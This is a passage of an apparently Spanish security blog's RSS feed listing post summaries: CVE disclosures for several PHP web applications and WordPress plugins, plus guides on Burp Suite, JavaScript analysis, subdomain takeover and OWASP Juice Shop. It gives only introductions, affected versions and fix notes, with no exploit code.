&lt;p&gt;&lt;strong&gt;Solución&lt;/strong&gt;: Añadir tokens anti-CSRF en las peticiones.&lt;/p&gt;</description></item><item><title>CVE-2019-14347 Escalacion de privilegios en Adive</title><link>https://hackpuntes.com/es/posts/cve-2019-14347-escalacion-de-privilegios-en-adive/</link><pubDate>Fri, 02 Aug 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-14347-escalacion-de-privilegios-en-adive/</guid><description>&lt;h2 id="adive-framework-207"&gt;Adive Framework 2.0.7&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-14347-escalacion-de-privilegios-en-adive/cve-2019-14347-escalacion-de-privilegios-en-adive_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-14347-escalacion-de-privilegios-en-adive/cve-2019-14347-escalacion-de-privilegios-en-adive_001.webp" alt="CVE-2019-14347 Escalacion de privilegios en Adive" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.adive.es/" target="_blank" rel="noopener noreferrer"&gt;https://www.adive.es/&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Adive es un Framework PHP 7 para desarrollar webs y aplicaciones en línea,administra bases de datos MySQL, es una alternativa rápida, fácil y excelente para generar plantillas teniendo así la principal estructura visual de cualquier pagina web. Esta versión incluye un kit de herramientas para desarrolladores para generar tablas, campos y entidades, formas de control y bases de datos. Adive es un ambicioso proyecto de Schben, cuyo objetivo es convertir la «codificación» en «diseño».&lt;/p&gt;</description></item><item><title>CVE 2019-14348 JoomSport - for Sports - SQL injection</title><link>https://hackpuntes.com/es/posts/cve-2019-14348-joomsport-for-sports-sql-injection/</link><pubDate>Mon, 29 Jul 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-14348-joomsport-for-sports-sql-injection/</guid><description>&lt;h2 id="joomsport-33-for-sports-team--league-football-hockey--more"&gt;JoomSport 3.3– for Sports: Team &amp;amp; League, Football, Hockey &amp;amp; more&lt;/h2&gt;
&lt;p&gt;JoomSport es un plugin de WordPress desarrollado en 2009 que ofrece características esenciales para cualquier sitio de deporte, estándares de ligas de deportes, deportes de equipo con sus respectivas descripciones, historial de partidos, estadísticas y fotos, incluyendo los enfrentamientos entre los equipos con los goles o tantos anotados por ambos equipos y detalles de los partidos.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;📅 Vulnerabilidad descubierta por Pablo Santiago el &lt;strong&gt;29/07/2019&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;🐛 &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14348" target="_blank" rel="noopener noreferrer"&gt;CVE-2019-14348&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.exploit-db.com/exploits/47210" target="_blank" rel="noopener noreferrer"&gt;ExploitDB&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🔗 Link del software &lt;a href="https://wordpress.org/plugins/joomsport-sports-league-results-management/" target="_blank" rel="noopener noreferrer"&gt;JoomSport&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🐞 Versión vulnerable = &lt;strong&gt;3.3&lt;/strong&gt; y anteriores probablemente.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Solución&lt;/strong&gt;: Parchear la vulnerabilidad para la siguiente versión filtrando los datos de entradas introducidos por el usuario.&lt;/p&gt;</description></item><item><title>Desplegar un servidor privado de Burp Collaborator en Azure</title><link>https://hackpuntes.com/es/posts/desplegar-un-servidor-privado-de-burp-collaborator-en-azure/</link><pubDate>Wed, 12 Jun 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/desplegar-un-servidor-privado-de-burp-collaborator-en-azure/</guid><description>&lt;p&gt;Burp Collaborator es un &lt;strong&gt;servicio externo&lt;/strong&gt; de Burp Suite que nos ayuda a detectar algunas vulnerabilidades basadas en interacciones con &lt;strong&gt;servicios externos&lt;/strong&gt; o las llamadas &lt;strong&gt;vulnerabilidades ciegas&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Por defecto, Burp Suite &lt;strong&gt;crea de manera automática&lt;/strong&gt; una instancia &lt;strong&gt;pública&lt;/strong&gt; de Collaborator en sus servidores de AWS para la realización de estas pruebas, por este motivo, algunos usuarios pueden tener &lt;strong&gt;preocupaciones sobre la seguridad de los datos procesados&lt;/strong&gt;, más aún si son de terceros. A continuación, se detallan los pasos para crear nuestro propio Burp Collaborator ayudándonos y complementando la &lt;a href="https://portswigger.net/burp/documentation/collaborator/deploying" target="_blank" rel="noopener noreferrer"&gt;documentación oficial&lt;/a&gt;
 de PortSwigger.&lt;/p&gt;</description></item><item><title>Guía sobre análisis estático de código JavaScript</title><link>https://hackpuntes.com/es/posts/guia-sobre-analisis-estatico-de-codigo-javascript/</link><pubDate>Mon, 20 May 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/guia-sobre-analisis-estatico-de-codigo-javascript/</guid><description>&lt;p&gt;&lt;strong&gt;JavaScript&lt;/strong&gt; se ha convertido en una de las tecnologías &lt;strong&gt;más utilizadas&lt;/strong&gt; de los navegadores modernos gracias a frameworks como AngularJS, ReactJS o Vue.js. Esta entrada pretende ser una guía sobre cómo encontrar y analizar todos los archivos JavaScript que contiene una aplicación web con el objetivo de detectar posibles vulnerabilidades, como en la entrada sobre &lt;a href="https://hackpuntes.com/guia-sobre-toma-de-control-de-subdominios/"&gt;toma de control de subdominios&lt;/a&gt;
, esta guía intentaré tenerla actualizada.&lt;/p&gt;
&lt;p&gt;Es esencial que entendamos la superficie de ataque de las aplicaciones y saber &lt;strong&gt;qué debemos buscar y dónde&lt;/strong&gt;. El análisis de código JavaScript es uno de ellos, por eso a continuación, se detallan una serie de puntos a seguir para detectar fallos de seguridad en el lado del cliente.&lt;/p&gt;</description></item><item><title>Guía sobre toma de control de subdominios</title><link>https://hackpuntes.com/es/posts/guia-sobre-toma-de-control-de-subdominios/</link><pubDate>Thu, 11 Apr 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/guia-sobre-toma-de-control-de-subdominios/</guid><description>&lt;p&gt;En esta publicación, voy a hablaros sobre una vulnerabilidad conocida como &lt;strong&gt;Toma de control de subdominios&lt;/strong&gt; (subdomain takeover), explicaré en qué consiste y como podemos detectarla. Es posible que pueda ir &lt;strong&gt;actualizando esta entrada&lt;/strong&gt; con nuevas herramientas o técnicas de descubrimiento, así que, te sugiero que la guardes en tus favoritos. 😉&lt;/p&gt;
&lt;h2 id="en-qué-consiste-la-vulnerabilidad"&gt;¿En qué consiste la vulnerabilidad?&lt;/h2&gt;
&lt;p&gt;La vulnerabilidad de toma de control de subdominio, ocurre cuando un &lt;strong&gt;registro DNS&lt;/strong&gt; (principalmente CNAME) habilita la delegación de zona &lt;strong&gt;a un servicio de terceros&lt;/strong&gt; (Amazon S3, Azure, GitHub, Heroku, etc) y, pasado un tiempo, este servicio &lt;strong&gt;puede dejar de ser utilizado o borrado y reclamado por un usuario malintencionado&lt;/strong&gt;, un ejemplo de un caso real sería el siguiente:&lt;/p&gt;</description></item><item><title>CVE-2019-7400 Rukovoditel ERP &amp; CRM 2.4.1 - Cross-Site Scripting Reflejado</title><link>https://hackpuntes.com/es/posts/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/</link><pubDate>Sun, 24 Mar 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/</guid><description>&lt;h2 id="cve-2019-7400"&gt;CVE-2019-7400&lt;/h2&gt;
&lt;h3 id="rukovoditel-erp--crm-241--cross-site-scripting-reflejado"&gt;Rukovoditel ERP &amp;amp; CRM 2.4.1 – Cross-Site Scripting Reflejado&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado_001.webp" alt="CVE-2019-7400 Rukovoditel ERP &amp;amp; CRM 2.4.1 - Cross-Site Scripting Reflejado" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Rukovoditel es una aplicación gratuita de &lt;strong&gt;gestión de proyectos de código abierto&lt;/strong&gt; basada en web. Muy lejos de las aplicaciones tradicionales, Rukovoditel ofrece a los usuarios un enfoque más amplio y extenso de la gestión de proyectos. Sus opciones de personalización permiten a los usuarios crear entidades adicionales, modificar y especificar la relación entre ellas y generar los informes necesarios. La plataforma permite a los usuarios crear su propia aplicación que está específicamente diseñada para su actividad (CRM, ERP, HRM, WMS, etc.)&lt;/p&gt;</description></item><item><title>Configurando Burp Suite para versiones superiores a Android Nougat</title><link>https://hackpuntes.com/es/posts/configurando-burp-suite-para-versiones-superiores-a-android-nougat/</link><pubDate>Sun, 24 Feb 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/configurando-burp-suite-para-versiones-superiores-a-android-nougat/</guid><description>&lt;p&gt;En las últimas semanas, estoy auditando varias aplicaciones de Android con Burp Suite, después de unos días de trabajo con mi vieja versión de Android 5.0 pensé que ya era hora de actualizar a una superior, y quizás, utilizar nuevas herramientas, aquí me tope con &lt;a href="https://www.genymotion.com/" target="_blank" rel="noopener noreferrer"&gt;Genymotion&lt;/a&gt;
 gracias a un compañero de trabajo.&lt;/p&gt;
&lt;p&gt;Una vez instalado y configurado Burp Suite con Android tal y como nos recomiendan en la web de &lt;a href="https://support.portswigger.net/customer/portal/articles/1841102-installing-burp-s-ca-certificate-in-an-android-device" target="_blank" rel="noopener noreferrer"&gt;Portswigger&lt;/a&gt;
, me encontré con el siguiente problema:&lt;/p&gt;</description></item><item><title>CVE-2018-19829 Integria IMS 5.0.83 - Cross-Site Request Forgery</title><link>https://hackpuntes.com/es/posts/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/</link><pubDate>Mon, 17 Dec 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/</guid><description>&lt;p&gt;Las vulnerabilidades &lt;a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%5c%28CSRF%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Request Forgery (CSRF)&lt;/a&gt;
 encontradas en el software &lt;a href="https://sourceforge.net/projects/integria/files/5.0.83/" target="_blank" rel="noopener noreferrer"&gt;Integria IMS 5.0.83&lt;/a&gt;
 han quedado solucionadas. Estas, &lt;strong&gt;permitían a un usuario malintencionado borrar usuarios de la aplicación&lt;/strong&gt; a través de este ataque. La vulnerabilidad, ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-19829" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-19829&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="cve-2018-19829"&gt;CVE-2018-19829&lt;/h2&gt;
&lt;h3 id="integria-ims-5083---cross-site-request-forgery-csrf"&gt;Integria IMS 5.0.83 - Cross-Site Request Forgery (CSRF)&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery_001.webp" alt="CVE-2018-19829 Integria IMS 5.0.83 - Cross-Site Request Forgery" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Integria IMS es un &lt;strong&gt;software de help desk&lt;/strong&gt; sencillo, potente y fácil de usar. Dispone de inventario automatizado y controlado desde un solo interfaz. Agiliza los procesos reduciendo los tiempos y costes de gestión en sus proyectos. Gracias a sus informes personalizados estará informado y podrá ver fácilmente la gestión y calidad del servicio dado en tiempo real.&lt;/p&gt;</description></item><item><title>CVE-2018-19828 Integria IMS 5.0.83 - Cross-Site Scripting Reflejado</title><link>https://hackpuntes.com/es/posts/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/</link><pubDate>Fri, 14 Dec 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/</guid><description>&lt;h2 id="cve-2018-19828"&gt;CVE-2018-19828&lt;/h2&gt;
&lt;h3 id="integria-ims-5083---cross-site-scripting-reflejado"&gt;Integria IMS 5.0.83 - Cross-Site Scripting Reflejado&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado_001.webp" alt="CVE-2018-19828 Integria IMS 5.0.83 - Cross-Site Scripting Reflejado" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Integria IMS es un &lt;strong&gt;software de help desk&lt;/strong&gt; sencillo, potente y fácil de usar. Dispone de inventario automatizado y controlado desde un solo interfaz. Agiliza los procesos reduciendo los tiempos y costes de gestión en sus proyectos. Gracias a sus informes personalizados estará informado y podrá ver fácilmente la gestión y calidad del servicio dado en tiempo real.&lt;/p&gt;</description></item><item><title>CVE-2018-18921 PHP Server Monitor 3.3.1 - Cross-Site Request Forgery</title><link>https://hackpuntes.com/es/posts/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery/</link><pubDate>Mon, 03 Dec 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery/</guid><description>&lt;p&gt;Las vulnerabilidades &lt;a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%5c%28CSRF%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Request Forgery (CSRF)&lt;/a&gt;
 encontradas en el software &lt;a href="https://github.com/phpservermon/phpservermon/releases/tag/v3.3.1" target="_blank" rel="noopener noreferrer"&gt;PHP Server Monitor 3.3.1&lt;/a&gt;
 han quedado solucionadas. Estas, &lt;strong&gt;permitían a un usuario malintencionado borrar servidores, logs y usuarios de la aplicación&lt;/strong&gt; a través de este ataque. La vulnerabilidad, ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-18921" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-18921&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="cve-2018-18921"&gt;CVE-2018-18921&lt;/h2&gt;
&lt;h3 id="php-server-monitor-331---cross-site-request-forgery-csrf"&gt;PHP Server Monitor 3.3.1 - Cross-Site Request Forgery (CSRF)&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery_001.webp" alt="CVE-2018-18921 PHP Server Monitor 3.3.1 - Cross-Site Request Forgery" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;PHP Server Monitor es una &lt;strong&gt;aplicación web orientada a monitorizar la disponibilidad de servidores PHP&lt;/strong&gt;, comprueba si están correctamente funcionando, monitoriza los servicios, genera gráficos e historial de actividad además de almacenar logs de errores y permitir notificaciones a través de email y Telegram, está desarrollada en PHP y MySQL.&lt;/p&gt;</description></item><item><title>TOP 10 herramientas de seguridad para aplicaciones web</title><link>https://hackpuntes.com/es/posts/top-10-herramientas-de-seguridad-para-aplicaciones-web/</link><pubDate>Tue, 20 Nov 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/top-10-herramientas-de-seguridad-para-aplicaciones-web/</guid><description>&lt;p&gt;En esta entrada, os mostraré un listado de las que son (para mí), &lt;strong&gt;las 10 mejores herramientas de seguridad para aplicaciones web.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;No soy un experto en hacking web y puede que no estés del todo de acuerdo con mi lista TOP, por lo tanto, siéntete libre de comentar y añadir la tuya 😉&lt;/p&gt;
&lt;h2 id="top-10-herramientas-de-seguridad-web"&gt;TOP 10 Herramientas de seguridad web&lt;/h2&gt;
&lt;h3 id="1-burp-suite"&gt;#1 Burp Suite&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/top-10-herramientas-de-seguridad-para-aplicaciones-web/top-10-herramientas-de-seguridad-para-aplicaciones-web_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/top-10-herramientas-de-seguridad-para-aplicaciones-web/top-10-herramientas-de-seguridad-para-aplicaciones-web_001.webp" alt="TOP 10 herramientas de seguridad para aplicaciones web" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>CVE-2018-18922 Ticketly 1.0 - Escalación de Privilegios (Crear cuenta administrador)</title><link>https://hackpuntes.com/es/posts/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/</link><pubDate>Mon, 05 Nov 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/</guid><description>&lt;p&gt;Hoy, publico otra entrada relacionada con vulnerabilidades en aplicaciones web, esta vez, sobre un software de ticketing llamado &lt;a href="https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql" target="_blank" rel="noopener noreferrer"&gt;Ticketly 1.0&lt;/a&gt;
 desarrollado por AbiSoft. La vulnerabilidad encontrada, permite a un atacante &lt;strong&gt;crearse una cuenta de administrador&lt;/strong&gt; en el sistema mediante una vulnerabilidad de &lt;a href="https://www.owasp.org/index.php/Testing_for_Privilege_escalation_%5c%28OTG-AUTHZ-003%5c%29" target="_blank" rel="noopener noreferrer"&gt;Escalación de Privilegios&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-18922" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-18922&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="ticketly--cve-2018-18922"&gt;Ticketly - CVE-2018-18922&lt;/h2&gt;
&lt;h3 id="ticketly-10---privilege-escalation-add-admin-account"&gt;Ticketly 1.0 - Privilege Escalation (Add Admin Account)&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador_001.webp" alt="CVE-2018-18922 Ticketly 1.0 - Escalación de Privilegios (Crear cuenta administrador)" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>CVE-2018-18923 Ticketly 1.0 - Múltiples SQL Injections</title><link>https://hackpuntes.com/es/posts/cve-2018-18923-ticketly-multiples-sql-injections/</link><pubDate>Mon, 05 Nov 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-18923-ticketly-multiples-sql-injections/</guid><description>&lt;p&gt;En la &lt;a href="https://hackpuntes.com/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/"&gt;entrada anterior&lt;/a&gt;
, hemos visto una vulnerabilidad de &lt;a href="https://www.owasp.org/index.php/Testing_for_Privilege_escalation_%5c%28OTG-AUTHZ-003%5c%29" target="_blank" rel="noopener noreferrer"&gt;Escalación de Privilegios&lt;/a&gt;
 en &lt;a href="https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql" target="_blank" rel="noopener noreferrer"&gt;Ticketly 1.0&lt;/a&gt;
, en esta entrada, vamos a ver otras vulnerabilidades que he encontrado en este software, en concreto, múltiples SQL Injections, estas vulnerabilidades han sido asociadas al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-18923" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-18923&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="ticketly--cve-2018-18923"&gt;Ticketly - CVE-2018-18923&lt;/h2&gt;
&lt;h3 id="ticketly-10---multiple-sql-injections"&gt;Ticketly 1.0 - Multiple SQL Injections&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-18923-ticketly-multiples-sql-injections/cve-2018-18923-ticketly-multiples-sql-injections_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-18923-ticketly-multiples-sql-injections/cve-2018-18923-ticketly-multiples-sql-injections_001.webp" alt="CVE-2018-18923 Ticketly 1.0 - Múltiples SQL Injections" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Ticketly 1.0, es un software de ticketing desarrollado por AbiSoft para ofrecer soporte a los usuarios sobre incidencias en los sistemas, está basado en PHP y MySQL.&lt;/p&gt;</description></item><item><title>CVE-2018-18478 Libre NMS 1.43 - Cross-Site Scripting Persistente</title><link>https://hackpuntes.com/es/posts/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente/</link><pubDate>Fri, 19 Oct 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente/</guid><description>&lt;p&gt;Esta entrada tiene como objetivo hacer pública la vulnerabilidad &lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%5c%28XSS%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Scripting Persistente&lt;/a&gt;
 descubierta en el software &lt;a href="https://github.com/librenms/librenms/releases/tag/1.43" target="_blank" rel="noopener noreferrer"&gt;Libre NMS 1.43&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-18478" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-18478&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="libre-nms--cve-2018-18478"&gt;Libre NMS - CVE-2018-18478&lt;/h2&gt;
&lt;h3 id="libre-nms-143--cross-site-scripting-persistente"&gt;Libre NMS 1.43 – Cross-Site Scripting Persistente&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente_001.webp" alt="CVE-2018-18478 Libre NMS 1.43 - Cross-Site Scripting Persistente" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Libre Network Monitoring System, es un software utilizado para monitoreo de red basado en PHP / MySQL / SNMP que incluye el soporte para una amplia gama de hardware de red y sistemas operativos que incluyen Cisco, Linux, FreeBSD, Juniper, Brocade, Foundry, HP y muchos más.&lt;/p&gt;</description></item><item><title>OWASP Juice Shop Project - Laboratorio para practicar las 10 vulnerabilidades más comunes en aplicaciones web</title><link>https://hackpuntes.com/es/posts/owasp-juice-shop-practicar-10-vulnerabilidades-mas-comunes-en-aplicaciones-web/</link><pubDate>Mon, 08 Oct 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/owasp-juice-shop-practicar-10-vulnerabilidades-mas-comunes-en-aplicaciones-web/</guid><description>&lt;p&gt;OWASP Juice Shop es una aplicación web desarrollada completamente en JavaScript con el objetivo de reproducir de manera intencionada las &lt;a href="https://www.owasp.org/index.php/Top_10-2017_Top_10" target="_blank" rel="noopener noreferrer"&gt;10 vulnerabilidades más comunes&lt;/a&gt;
 en aplicaciones web (Top Ten de OWASP) para que el usuario pueda explotarlas y aprender sobre la seguridad en aplicaciones web.&lt;/p&gt;
&lt;h2 id="top-ten-de-owasp-2017"&gt;TOP Ten de OWASP (2017)&lt;/h2&gt;
&lt;p&gt;Estas son las vulnerabilidades más comunes en aplicaciones web en el 2017&lt;/p&gt;
&lt;h3 id="1-inyección"&gt;1) Inyección&lt;/h3&gt;
&lt;p&gt;Las fallas de inyección, como SQL, NoSQL, OS o LDAP ocurren cuando se envían datos no confiables a un intérprete, como parte de un comando o consulta. Los datos dañinos del atacante pueden engañar al intérprete para que ejecute comandos involuntarios o acceda a los datos sin la debida autorización.&lt;/p&gt;</description></item><item><title>CVE-2018-15918 Jorani Leave Management System 0.6.5 - SQL Injection</title><link>https://hackpuntes.com/es/posts/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/</link><pubDate>Mon, 03 Sep 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/</guid><description>&lt;p&gt;Esta entrada tiene como finalidad hacer pública la vulnerabilidad &lt;a href="https://www.owasp.org/index.php/SQL_Injection" target="_blank" rel="noopener noreferrer"&gt;SQL Injection&lt;/a&gt;
 descubierta en el software &lt;a href="https://jorani.org/download.html" target="_blank" rel="noopener noreferrer"&gt;Jorani Leave Management System 0.6.5&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15918" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-159178&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="joranicve-2018-15918"&gt;Jorani CVE-2018-15918&lt;/h2&gt;
&lt;h3 id="jorani-leave-management-system-065--sql-injection"&gt;Jorani Leave Management System 0.6.5 – SQL Injection&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection_001.webp" alt="CVE-2018-15918 Jorani Leave Management System 0.6.5 - SQL Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Jorani es un sistema de administración de licencias desarrollado en PHP / MySQL bajo una licencia AGPL v3, está diseñado para proporcionar solicitud de flujos de trabajo simples y tiempo extra para organizaciones pequeñas.&lt;/p&gt;</description></item><item><title>CVE-2018-15917 Jorani Leave Management System 0.6.5 - Cross-Site Scripting Persistente</title><link>https://hackpuntes.com/es/posts/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/</link><pubDate>Sat, 01 Sep 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/</guid><description>&lt;p&gt;Esta entrada tiene como objetivo hacer pública la vulnerabilidad &lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%5c%28XSS%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Scripting Persistente&lt;/a&gt;
 descubierta en el software &lt;a href="https://jorani.org/download.html" target="_blank" rel="noopener noreferrer"&gt;Jorani Leave Management System 0.6.5&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15917" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-15917&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="joranicve-2018-15917"&gt;Jorani CVE-2018-15917&lt;/h2&gt;
&lt;h3 id="jorani-leave-management-system-065---cross-site-scripting-persistente"&gt;Jorani Leave Management System 0.6.5 - Cross-Site Scripting Persistente&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente_001.webp" alt="CVE-2018-15917 Jorani Leave Management System 0.6.5 - Cross-Site Scripting Persistente" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
